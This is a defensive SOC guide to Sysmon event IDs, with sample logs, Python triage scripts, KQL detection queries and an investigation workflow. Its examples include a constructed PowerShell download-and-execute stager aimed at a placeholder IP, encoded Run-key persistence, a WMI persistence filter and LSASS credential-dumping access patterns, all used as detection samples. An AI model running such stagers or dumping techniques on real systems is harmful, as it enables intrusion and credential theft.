Sysmon Logs

Sysmon (System Monitor) is a Sysinternals driver and service that provides far deeper endpoint telemetry than the default Windows Security and System logs. It records process execution with full command lines, network connections, registry changes, file creation, driver and DLL loading, WMI subscriptions, named pipes, DNS queries, and more.
For a SOC analyst, Sysmon is one of the most valuable data sources for detecting modern attacks, especially fileless malware, lateral movement, persistence, privilege escalation, and post-exploitation activity. Keep in mind that Sysmon only logs what its configuration includes; a weak config means blind spots rather than visibility.

This chapter covers Sysmon at the depth a SOC analyst needs: representative log samples, the footprint each attacker technique leaves in the events, analyst workflows, SIEM queries, and a full attack timeline.


Why Sysmon Is Critical for SOC

Default Windows logs are limited: Security event 4688 records command lines only when the "Include command line in process creation events" policy is enabled, and nothing native links a process to its network connections, DLL loads or registry writes.
Sysmon fixes that by providing:

  • Full command-line visibility

  • Parent-child process tracking

  • Network connection telemetry

  • DLL and driver load visibility

  • Registry and file operations

  • WMI operations

  • Hashes of executables

  • Ability to correlate nearly any malicious behavior

Attackers cannot hide easily when Sysmon is deployed with a well-tuned config. Start from a community baseline such as SwiftOnSecurity's sysmon-config or Olaf Hartong's sysmon-modular rather than the defaults: a default install only hashes with SHA1 and does not enable network connections (Event 3), image loads (Event 7), process access (Event 10) or DNS queries (Event 22) at all.


Sysmon Data Sources

Sysmon uses the Microsoft-Windows-Sysmon/Operational event channel.

Log file:

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx

It is normally forwarded to the SIEM with an agent such as Winlogbeat or NXLog, or through Windows Event Forwarding (WEF).


Sysmon Event IDs (Practical Focus)

Below are the actual Sysmon events SOC analysts use, with realistic raw logs and attack interpretation.


Event ID 1 — Process Creation (Most Important Event)

This log reveals:

  • Full command line (and the parent's command line)

  • Parent process, plus ProcessGuid and ParentProcessGuid, the keys that link every other Sysmon event back to this process

  • Integrity level and the user the process runs as

  • Hash of the executed image (which algorithms appear depends on the config)

Raw Example:

EventID=1
ProcessGuid={...}
ParentProcessGuid={...}
ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine=powershell.exe -nop -w hidden -enc JAB...
IntegrityLevel=Medium
Hashes=SHA256=F23AB12...
User=DESKTOP\mayur

Attack Interpretation:

  • Word → PowerShell → encoded, hidden-window command

  • A strong indicator of a malicious macro or phishing payload: Office applications have almost no legitimate reason to spawn PowerShell with -nop -w hidden -enc. Decode the Base64 payload before escalating (it is UTF-16LE, not ASCII) so the ticket states what the script actually does.

Sysmon Event ID 1 is the foundation of nearly every malware detection rule.
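As an added example (not part of the original page, and not Sysmon's own tooling), the following Python triage function parses an Event 1 record in the Key=Value form used above, flags the Office→script-host chain and the hidden-window switch, and decodes the -EncodedCommand payload, which PowerShell expects as Base64 over UTF-16LE. The sample event and the stager inside it are constructed for the example (the URL uses a documentation address range), and the OFFICE_PARENTS and SCRIPT_HOSTS lists are assumed starting points to tune for your environment.

```python
import base64
import re

# Parents that should almost never spawn a script host, and the script hosts
# themselves (assumed starting lists; extend for your environment).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand;
# -e, -ec and -enc are what malware actually uses.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def parse_event(raw: str) -> dict:
    """Parse the Key=Value lines used on this page into a dict.

    Real Sysmon records arrive as event XML or Winlogbeat JSON; only this
    parser changes, the triage logic below does not.
    """
    event = {}
    for line in raw.strip().splitlines():
        key, _, value = line.partition("=")
        event[key.strip()] = value.strip()
    return event


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process_create(event: dict) -> dict:
    """Score one Event 1 record; returns findings plus the decoded script, if any."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    command_line = event.get("CommandLine", "")
    findings = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office-app-spawned-script-host: {parent} -> {child}")
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        findings.append("encoded-powershell-command")
    lowered = command_line.lower()
    if "-w hidden" in lowered or "-windowstyle hidden" in lowered:
        findings.append("hidden-window")
    return {"findings": findings, "decoded_command": decoded}


# Constructed sample: a macro-style download stager, encoded the way
# PowerShell expects it (Base64 of the UTF-16LE script text).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENT = (
    "EventID=1\n"
    "ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE\n"
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
    "CommandLine=powershell.exe -nop -w hidden -enc " + ENCODED_STAGER + "\n"
    "User=DESKTOP\\mayur\n"
)

if __name__ == "__main__":
    result = triage_process_create(parse_event(SAMPLE_EVENT))
    for finding in result["findings"]:
        print("ALERT:", finding)
    print("decoded:", result["decoded_command"])
```

The decoder is deliberately strict: a -enc argument that is not valid Base64, or not valid UTF-16LE once decoded, returns None rather than raising, so the record still gets its other findings and the odd payload can be looked at by hand.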


Event ID 2 — File Creation Time Changed

Used mostly for detecting:

  • timestomping

  • anti-forensics

Raw Example:

EventID=2
Image=C:\Users\mayur\Downloads\payload.exe
TargetFilename=C:\Users\mayur\Downloads\payload.exe
CreationUtcTime=<new creation time>
PreviousCreationUtcTime=<original creation time>

A creation time pushed years into the past on a freshly written executable is the classic timestomp. Legitimate software (installers, archive extractors, file-sync clients) also sets creation times when it restores or copies files, so judge the event by the Image that made the change and the path of the TargetFilename rather than flagging every occurrence.


Event ID 3 — Network Connection

Logs TCP and UDP connections made or accepted by processes. It is off by default and must be enabled in the config; most baselines include it for script hosts, Office applications and anything running from user-writable paths.

Raw Example:

EventID=3
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User=DESKTOP\mayur
Protocol=tcp
Initiated=true
SourceIp=10.10.4.15
SourcePort=51732
DestinationIp=185.22.111.10
DestinationPort=443

Attack Insight:

  • PowerShell connecting to an unknown public IP → possible C2

  • Pivot on ProcessGuid to the Event 1 that created the process to see the command line that opened the connection

  • Sysmon records the connection, not the traffic: there are no byte counts, so volume and content have to come from the firewall, proxy or NetFlow

This is critical for detecting:

  • malware beaconing (regular intervals to the same destination)

  • lateral movement (connections to internal hosts on 445, 135, 5985/5986, 3389)

  • exfiltration

  • payload downloads


Event ID 6 — Driver Loaded

Used for detecting:

  • rootkits

  • malicious or vulnerable kernel drivers (BYOVD: attackers load a legitimately signed but exploitable driver to disable EDR)

  • AV tampering

Example:

EventID=6
ImageLoaded=C:\Windows\Temp\malDrv.sys
Signed=false
Signature=-
SignatureStatus=Unavailable

An unsigned driver, or any driver loading from a temp or user-writable path, is a red flag. A valid signature does not clear a driver either: BYOVD drivers are signed by design, so compare the hash against a known-vulnerable driver list (loldrivers.io is the usual reference).

Event ID 7 — Image Loaded

Logs DLL (image) loading into a process. It is off by default and very noisy, so configs usually include only loads into sensitive processes such as lsass.exe, or DLLs that are unsigned or loaded from unusual paths.

Useful for:

  • Process injection and DLL side-loading

  • Mimikatz module loads

  • Reflective DLL injection, indirectly: a reflectively loaded DLL bypasses the Windows loader and produces no Event 7, so a process whose behaviour implies a loaded tool with no matching image load is itself a clue

Example:

EventID=7
Image=C:\Windows\System32\lsass.exe
ImageLoaded=C:\Windows\System32\mimilib.dll
Signed=false
SignatureStatus=Unavailable

Huge red flag: mimilib.dll is the Mimikatz Security Support Provider, registered so that LSASS loads it and writes plaintext credentials to disk at each logon. Any unsigned DLL loading into LSASS deserves immediate attention; with LSA protection (RunAsPPL) enabled, LSASS refuses unsigned DLLs in the first place.


Event ID 8 — CreateRemoteThread (Critical for Credential Theft Detection)

Used for:

  • Mimikatz and other LSASS-targeting tools

  • Cobalt Strike and similar frameworks injecting into another process

  • Classic process injection (CreateRemoteThread after WriteProcessMemory)

  • Lateral movement tooling that injects into existing processes

Raw Example:

EventID=8
SourceImage=C:\Windows\System32\cmd.exe
TargetImage=C:\Windows\System32\lsass.exe
StartAddress=0x00007FF...
StartModule=-
StartFunction=-

A user-launched process creating a thread in LSASS is malicious unless the source is a known security product. StartModule=- means the thread starts in memory that no loaded module backs, which is what injected shellcode looks like. Two caveats: Sysmon only sees CreateRemoteThread, so injection through QueueUserAPC, SetThreadContext or thread hijacking produces no Event 8, and some legitimate components (EDR and AV agents in particular) do create remote threads, so keep an exclusion list.


Event ID 9 — Raw Disk Access

Logs reads from a drive using the \\.\ device notation, which bypasses the file system and therefore file locks, ACLs and file-access auditing.

Useful for detecting:

  • tools that copy locked credential files such as SAM or NTDS.dit straight from the volume

  • disk-level tampering and sector-level reads by malware

Example:

EventID=9
Image=C:\Users\mayur\AppData\Local\Temp\malware.exe
Device=\Device\HarddiskVolume1

Backup agents, defragmentation and disk-repair tools read volumes raw all day, so filter on the Image: an unsigned binary in a user-writable path opening the system volume is the interesting case.

Event ID 10 — Process Access (LSASS Protection)

Logs a process opening a handle to another process, together with the access rights it was granted. It is off by default; configs normally include only opens where TargetImage is lsass.exe (and sometimes other sensitive targets), because logging every OpenProcess is unworkable.

Most critical Sysmon event for detecting:

  • Mimikatz

  • Credential dumping (procdump, comsvcs.dll MiniDump via rundll32, Task Manager dump files)

  • Token theft

Example:

EventID=10
SourceImage=C:\Tools\procdump.exe
TargetImage=C:\Windows\system32\lsass.exe
GrantedAccess=0x1FFFFF
CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2e03d|C:\Tools\procdump.exe+1a3f2

Read the GrantedAccess mask, not just the event. 0x1FFFFF is PROCESS_ALL_ACCESS. Dumping needs PROCESS_VM_READ (0x0010) together with PROCESS_QUERY_INFORMATION (0x0400) or PROCESS_QUERY_LIMITED_INFORMATION (0x1000), so masks such as 0x1010, 0x1410 and 0x1438 are the ones Mimikatz and dump tools request, while 0x1000 or 0x1400 alone cannot read memory. A CallTrace entry of UNKNOWN means the caller sits in memory backed by no module, typically injected shellcode. Many legitimate processes open LSASS (MsMpEng.exe, csrss.exe, wmiprvse.exe, EDR agents), so tune an exclusion list by SourceImage instead of alerting on every hit.
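The mask logic described above for Event 10, together with the Event 8 case from the previous section, as an added Python example that is not from the page or from Sysmon: it decodes GrantedAccess into the PROCESS_* rights from winnt.h, applies a known-good exclusion list, and rates records that target lsass.exe. The sample events are constructed (the CallTrace offsets are illustrative), and KNOWN_LSASS_OPENERS is an assumed starting list to tune for your fleet.

```python
# PROCESS_* access rights from winnt.h, in ascending bit order.
PROCESS_RIGHTS = {
    0x0001: "TERMINATE",
    0x0002: "CREATE_THREAD",
    0x0008: "VM_OPERATION",
    0x0010: "VM_READ",
    0x0020: "VM_WRITE",
    0x0040: "DUP_HANDLE",
    0x0400: "QUERY_INFORMATION",
    0x1000: "QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF

# Processes that legitimately open LSASS all day (assumed list; tune it).
KNOWN_LSASS_OPENERS = {"msmpeng.exe", "csrss.exe", "wmiprvse.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_access(mask: int) -> list:
    """Names of the rights set in a GrantedAccess mask (the subset we care about)."""
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]


def triage_lsass_event(event: dict) -> dict:
    """Rate an Event 8 or Event 10 record whose target is lsass.exe."""
    if basename(event.get("TargetImage", "")) != "lsass.exe":
        return {"severity": "none", "reasons": []}
    source = basename(event.get("SourceImage", ""))
    if source in KNOWN_LSASS_OPENERS:
        return {"severity": "info", "reasons": ["known-good source image"]}

    if event.get("EventID") == "8":
        reasons = ["remote thread created in lsass"]
        if event.get("StartModule", "-") == "-":
            reasons.append("thread start address not backed by any module")
        return {"severity": "critical", "reasons": reasons}

    mask = int(event.get("GrantedAccess", "0x0"), 16)
    rights = decode_access(mask)
    # Reading LSASS memory needs VM_READ plus one of the QUERY rights.
    can_read = "VM_READ" in rights and (
        "QUERY_INFORMATION" in rights or "QUERY_LIMITED_INFORMATION" in rights)
    unbacked_caller = "UNKNOWN" in event.get("CallTrace", "")
    reasons = []
    if mask == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS requested")
    elif can_read:
        reasons.append("memory-read capable mask: " + "|".join(rights))
    if unbacked_caller:
        reasons.append("caller in unbacked memory (CallTrace contains UNKNOWN)")

    if mask == PROCESS_ALL_ACCESS or (can_read and unbacked_caller):
        severity = "critical"
    elif can_read:
        severity = "high"
    else:
        severity = "low"
        reasons.append("query-only access: " + ("|".join(rights) or "none"))
    return {"severity": severity, "reasons": reasons}


# Constructed samples: a procdump run, a Mimikatz-style open from shellcode,
# Defender's routine access, and an injected thread.
SAMPLES = [
    {"EventID": "10", "SourceImage": "C:\\Tools\\procdump.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4|C:\\Tools\\procdump.exe+1a3f2"},
    {"EventID": "10", "SourceImage": "C:\\Users\\mayur\\AppData\\Local\\Temp\\svc.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4|UNKNOWN(000001D2A3B40A0C)"},
    {"EventID": "10", "SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1400",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4"},
    {"EventID": "8", "SourceImage": "C:\\Windows\\System32\\rundll32.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "StartAddress": "0x00007FF6A1B20000",
     "StartModule": "-", "StartFunction": "-"},
]


def triage_samples() -> dict:
    """Severity per source image for the constructed samples."""
    return {basename(ev["SourceImage"]): triage_lsass_event(ev)["severity"] for ev in SAMPLES}


if __name__ == "__main__":
    for ev in SAMPLES:
        print(basename(ev["SourceImage"]), triage_lsass_event(ev))
```

The exclusion list is checked first on purpose: a known-good opener with a memory-read mask is normal for an AV engine, and alerting on it trains analysts to ignore the event. The cost is that a tool copied to a path whose basename matches an excluded image slips through, so in production match on full path and signer rather than basename.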


Event ID 11 — File Create

Logs creation (or overwrite) of files. Configs typically include executable and script extensions everywhere, plus everything written to staging paths such as C:\Users\Public, %TEMP%, %APPDATA% and C:\ProgramData.

Useful for:

  • dropped payloads

  • malware staging

  • suspicious persistence (files appearing in Startup folders or scheduled-task directories)

Example:

EventID=11
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename=C:\Users\Public\backdoor.exe

Event ID 12 – 14 — Registry Events

Covers:

  • Event 12: registry key or value created or deleted

  • Event 13: registry value set (the one you will query most)

  • Event 14: registry key or value renamed

Used to detect:

  • registry-based persistence (Run/RunOnce keys, Winlogon Shell and Userinit, IFEO Debugger values, service ImagePath changes)

  • disabling security controls (for example Defender's DisableRealtimeMonitoring under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection)

Example:

EventID=13
EventType=SetValue
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject=HKU\S-1-5-21-...\Software\Microsoft\Windows\CurrentVersion\Run\updater
Details="powershell -enc JAB..."

Note that Sysmon writes user hives as HKU\<SID>\..., not HKCU, so match on \CurrentVersion\Run rather than on the hive prefix.

Event ID 15 — File Stream Created

Logs creation of a named NTFS alternate data stream (ADS), including a Hash of the stream and, for small streams, its Contents.

Example:

EventID=15
Image=C:\Program Files\Google\Chrome\Application\chrome.exe
TargetFilename=C:\Users\mayur\Downloads\ads.zip:Zone.Identifier
Contents=[ZoneTransfer]  ZoneId=3  ReferrerUrl=<page the download came from>  HostUrl=<URL the file was fetched from>

The Zone.Identifier stream itself is benign: it is the Mark-of-the-Web that browsers and mail clients write on every download, and most Event 15 records are exactly that. Its value to an analyst is the Contents field, which gives the download origin of a file you later see executed in Event 1. The suspicious cases are streams with other names, or executable content (an .exe or a script) stored inside a stream to hide it from directory listings.

Used by:

  • malware

  • data hiding techniques


Event ID 19–21 — WMI Events

Detect:

  • WMI persistence: a permanent event subscription is a filter (Event 19), a consumer (Event 20) and the binding between them (Event 21)

  • Remote execution and recon over WMI (wmic /node, Invoke-WmiMethod) do not produce these events; on the target they appear as Event 1 with WmiPrvSE.exe as the parent, and on the source as wmic.exe or PowerShell command lines

Example:

EventID=19
EventType=WmiFilterEvent
Operation=Created
User=DESKTOP\mayur
EventNamespace="root\\subscription"
Name="PersistenceFilter"
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"

Attackers often use WMI for stealthy persistence. The filter above fires a few minutes after boot; the matching Event 20 consumer is usually a CommandLineEventConsumer or ActiveScriptEventConsumer whose Destination field carries the payload, and Event 21 shows which filter it is bound to. A filter on uptime, logon or a timer, bound to a consumer that runs PowerShell, is the pattern to alert on.


Event ID 22 — DNS Query

Logs DNS queries made by a process: the Image that issued them, the QueryName, the QueryStatus and the QueryResults. It is off by default and high-volume; configs usually exclude well-known update and telemetry domains rather than trying to include specific ones.

Example:

EventID=22
QueryName=abcdnsqxpwoi.ru
QueryStatus=9003
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Used to detect:

  • DGA domains (long, high-entropy labels, and bursts of NXDOMAIN answers, which Sysmon reports as QueryStatus 9003)

  • C2

  • Malware callbacks (tie the resolved address in QueryResults to the Event 3 that follows)
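The DGA heuristics above, as an added Python example that is not from the page: it scores the registrable label of each Event 22 QueryName on length, Shannon entropy, consonant runs, vowel ratio and digit ratio, and separately flags NXDOMAIN answers (QueryStatus 9003) from script hosts. The thresholds, the short public-suffix list and the script-host list are assumptions for the example (use the Public Suffix List and your own baselines in production); the sample events are constructed.

```python
import math

VOWELS = set("aeiou")
# Two-label public suffixes seen often enough to matter (assumed short list;
# use the Public Suffix List in production).
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br", "co.in"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe"}
NXDOMAIN = "9003"  # DNS_ERROR_RCODE_NAME_ERROR as Sysmon reports it in QueryStatus


def registrable_label(qname: str) -> str:
    """The label just below the public suffix, e.g. 'bbc' for news.bbc.co.uk."""
    parts = qname.lower().rstrip(".").split(".")
    if len(parts) >= 3 and ".".join(parts[-2:]) in TWO_LABEL_SUFFIXES:
        return parts[-3]
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(text: str) -> float:
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def max_non_vowel_run(label: str) -> int:
    """Longest run of characters that are neither vowels nor hyphens."""
    run = best = 0
    for ch in label:
        run = 0 if ch in VOWELS or ch == "-" else run + 1
        best = max(best, run)
    return best


def dga_score(qname: str) -> dict:
    """Crude DGA score: one point per feature, suspicious at 3 or more."""
    label = registrable_label(qname)
    n = len(label) or 1
    entropy = shannon_entropy(label)
    vowel_ratio = sum(ch in VOWELS for ch in label) / n
    digit_ratio = sum(ch.isdigit() for ch in label) / n
    score = sum([len(label) >= 10, entropy >= 3.0, max_non_vowel_run(label) >= 4,
                 vowel_ratio < 0.3, digit_ratio > 0.2])
    return {"label": label, "entropy": round(entropy, 2),
            "score": score, "suspicious": score >= 3}


def triage_dns_events(events: list) -> list:
    """Return (QueryName, reason) for the Event 22 records worth a look."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "22":
            continue
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        qname = ev.get("QueryName", "")
        verdict = dga_score(qname)
        if verdict["suspicious"]:
            hits.append((qname, f"dga-like label '{verdict['label']}' score={verdict['score']}"))
        elif ev.get("QueryStatus") == NXDOMAIN and image in SCRIPT_HOSTS:
            hits.append((qname, f"nxdomain from script host {image}"))
    return hits


# Constructed Event 22 samples: two DGA-style names, a normal Microsoft
# logon domain, and a script host getting NXDOMAIN for an ordinary-looking name.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": "22", "QueryName": "abcdnsqxpwoi.ru", "QueryStatus": "9003", "Image": PS},
    {"EventID": "22", "QueryName": "login.microsoftonline.com", "QueryStatus": "0",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"},
    {"EventID": "22", "QueryName": "x7k2q9mzp4tr.com", "QueryStatus": "9003",
     "Image": "C:\\Windows\\System32\\svchost.exe"},
    {"EventID": "22", "QueryName": "update.contoso.com", "QueryStatus": "9003", "Image": PS},
    {"EventID": "3", "DestinationIp": "185.22.111.10", "DestinationPort": "443", "Image": PS},
]

if __name__ == "__main__":
    for qname, reason in triage_dns_events(SAMPLE_EVENTS):
        print(qname, "->", reason)
```

Single-feature rules fail in both directions (stackoverflow has high entropy, microsoft has a low vowel ratio), which is why the score needs three features to agree; even so, treat the output as a queue for the analyst, not an alert on its own, and combine it with the NXDOMAIN rate per process.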


Sysmon in Real Attack Detection

Below is a representative attack chain as Sysmon records it, with every step tied to the same process lineage.


Step 1 — Phishing Document Execution

Sysmon Event 1:

WINWORD.EXE → powershell.exe -nop -w hidden -enc JAB...

Step 2 — Payload Download

Event 3 (same ProcessGuid as the Event 1 above):

powershell.exe → 185.22.110.20:443

Step 3 — Credential Dump

Event 10:

powershell.exe → lsass.exe (GrantedAccess including VM_READ, for example 0x1010)

Step 4 — Lateral Movement Prep

Event 1 & 3:

cmd.exe launching winrm / winrs commands
SMB (445) and WinRM (5985) connections to other internal hosts

Step 5 — Persistence Created

Event 13:

Run key value set under HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Run, pointing at the same encoded PowerShell

Step 6 — Exfiltration

Event 3:

powershell.exe → 91.22.10.4:8080
Sysmon records the connection but not its size, so confirm the data volume from proxy, firewall or NetFlow logs before calling it exfiltration.

Sysmon ties the whole attack together with exact process lineage: every event carries the ProcessGuid of the process that caused it, and Event 1 carries the ParentProcessGuid, so the chain can be rebuilt even after PIDs have been reused.


SIEM Queries for Sysmon Attacks

The queries below use Kibana KQL syntax with Sysmon's native field names. Under Winlogbeat's Sysmon module the same data lands in ECS fields (process.parent.executable, process.command_line, destination.ip, registry.path, dns.question.name) or under winlog.event_data.*, so adjust the field names to your pipeline.

Detect suspicious parent → child chains

event.code:1 AND ParentImage:*\\winword.exe AND Image:*\\powershell.exe

Detect encoded PowerShell commands

event.code:1 AND Image:*\\powershell.exe AND CommandLine:(*-enc* OR *-EncodedCommand*)

Detect suspicious network connections (script hosts talking to non-private addresses; DestinationIp must be mapped as an ip field for the CIDR match to work)

event.code:3 AND Image:(*\\powershell.exe OR *\\rundll32.exe OR *\\mshta.exe) AND NOT DestinationIp:(10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)

Detect LSASS memory access (exclude your known-good openers, then review GrantedAccess)

event.code:10 AND TargetImage:*\\lsass.exe AND NOT SourceImage:(*\\MsMpEng.exe OR *\\csrss.exe OR *\\wmiprvse.exe)

Detect script-based persistence

event.code:13 AND TargetObject:*\\CurrentVersion\\Run* AND Details:*powershell*

Detect C2 DNS queries (a TLD match is a crude first filter; NXDOMAIN bursts from a script host are a better DGA signal)

event.code:22 AND QueryName.keyword:*.ru

event.code:22 AND QueryStatus:9003 AND Image:*\\powershell.exe

Detect process injection

event.code:8 AND TargetImage:*\\lsass.exe

Analyst Workflow When Investigating Sysmon Logs

  1. Start with Event ID 1
    Check parent, command line and hashes, and note the ProcessGuid: it is the pivot for every other event.

  2. Check Event ID 3
    Determine C2 destinations.

  3. Check Event ID 10 & 8
    Identify credential dumping and injection.

  4. Check Event ID 13
    Look for persistence.

  5. Check Event ID 22
    See if malware contacted DGA / suspicious domains.

  6. Check Event ID 11
    Look for dropped payloads.

  7. Map all events to a timeline
    Order by UtcTime, group by ProcessGuid, and build the attack narrative from the lineage.

  8. Confirm whether behavior matches known attack patterns

  9. Escalate to incident response if malicious
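The timeline step, as an added Python example (not code from the page): it indexes Event 1 records by ProcessGuid, walks ParentProcessGuid links so every event is printed with its full process lineage, and orders everything by UtcTime. It serves both the attack chain above and steps 1 to 7 of the workflow. The events are constructed to match that chain; the GUIDs are placeholders, and the field names follow Sysmon's own (which, as the comment notes, differ per event type for the acting process).

```python
# Sysmon names the acting process's GUID differently per event type:
# ProcessGuid (1, 3, 11, 12-14, 22), SourceProcessGUID (10), SourceProcessGuid (8).
GUID_FIELDS = ("ProcessGuid", "SourceProcessGUID", "SourceProcessGuid")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def actor_guid(event: dict) -> str:
    for field in GUID_FIELDS:
        if field in event:
            return event[field]
    return ""


def lineage(procs: dict, guid: str) -> str:
    """Walk ParentProcessGuid links through Event 1 records back to the root."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        chain.append(basename(procs[guid]["Image"]))
        guid = procs[guid].get("ParentProcessGuid", "")
    return " > ".join(reversed(chain)) or "(unknown lineage)"


def summarize(event: dict) -> str:
    eid = event["EventID"]
    if eid == "1":
        return "process created: " + event.get("CommandLine", "")
    if eid == "3":
        return f"network {event.get('DestinationIp')}:{event.get('DestinationPort')}/{event.get('Protocol')}"
    if eid == "8":
        return "remote thread into " + basename(event.get("TargetImage", ""))
    if eid == "10":
        return f"opened {basename(event.get('TargetImage', ''))} with {event.get('GrantedAccess')}"
    if eid == "11":
        return "file created: " + event.get("TargetFilename", "")
    if eid == "13":
        return f"registry set {event.get('TargetObject')} = {event.get('Details')}"
    if eid == "22":
        return f"dns {event.get('QueryName')} status={event.get('QueryStatus')}"
    return "event " + eid


def build_timeline(events: list) -> list:
    """Order events by UtcTime and attach the full process lineage to each."""
    procs = {ev["ProcessGuid"]: ev for ev in events if ev["EventID"] == "1"}
    rows = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        rows.append({
            "time": ev["UtcTime"],
            "event_id": ev["EventID"],
            "lineage": lineage(procs, actor_guid(ev)),
            "summary": summarize(ev),
        })
    return rows


# Constructed events mirroring the chain in this chapter; GUIDs are placeholders.
G_EXPLORER, G_WORD, G_PS = "{GUID-EXPLORER}", "{GUID-WORD}", "{GUID-PS}"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": "3", "UtcTime": "2024-03-11 09:14:04.010", "ProcessGuid": G_PS,
     "DestinationIp": "185.22.110.20", "DestinationPort": "443", "Protocol": "tcp"},
    {"EventID": "1", "UtcTime": "2024-03-11 09:10:00.000", "ProcessGuid": G_EXPLORER,
     "ParentProcessGuid": "{GUID-USERINIT}", "Image": "C:\\Windows\\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"EventID": "1", "UtcTime": "2024-03-11 09:13:40.000", "ProcessGuid": G_WORD,
     "ParentProcessGuid": G_EXPLORER, "Image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "CommandLine": "WINWORD.EXE /n invoice.docm"},
    {"EventID": "1", "UtcTime": "2024-03-11 09:14:02.113", "ProcessGuid": G_PS,
     "ParentProcessGuid": G_WORD, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc JAB..."},
    {"EventID": "22", "UtcTime": "2024-03-11 09:14:03.500", "ProcessGuid": G_PS,
     "QueryName": "abcdnsqxpwoi.ru", "QueryStatus": "0"},
    {"EventID": "10", "UtcTime": "2024-03-11 09:16:12.700", "SourceProcessGUID": G_PS,
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": "13", "UtcTime": "2024-03-11 09:17:30.200", "ProcessGuid": G_PS,
     "TargetObject": "HKU\\S-1-5-21-...\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater",
     "Details": "powershell -enc JAB..."},
]

if __name__ == "__main__":
    for row in build_timeline(SAMPLE_EVENTS):
        print(row["time"], row["event_id"], row["lineage"], "|", row["summary"])
```

Because every row carries the lineage string, the whole chain (DNS, C2 connection, LSASS access, Run key) can be grouped under "explorer.exe > WINWORD.EXE > powershell.exe" without trusting PIDs, and a process whose Event 1 never arrived shows up as "(unknown lineage)" instead of silently attaching to the wrong parent.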


Intel Dump

  • Sysmon logs provide deep visibility missing in normal Windows logs.

  • Key events include:

    • 1 (process creation)

    • 3 (network connection)

    • 10 (process access)

    • 8 (remote thread)

    • 13 (registry persistence)

    • 11 (file creation)

    • 22 (DNS query)

  • Sysmon exposes macro malware, fileless attacks, C2 communication, credential dumping, lateral movement, and persistence.

  • Analysts rely heavily on Sysmon to build attack timelines and identify parent-child process chains.

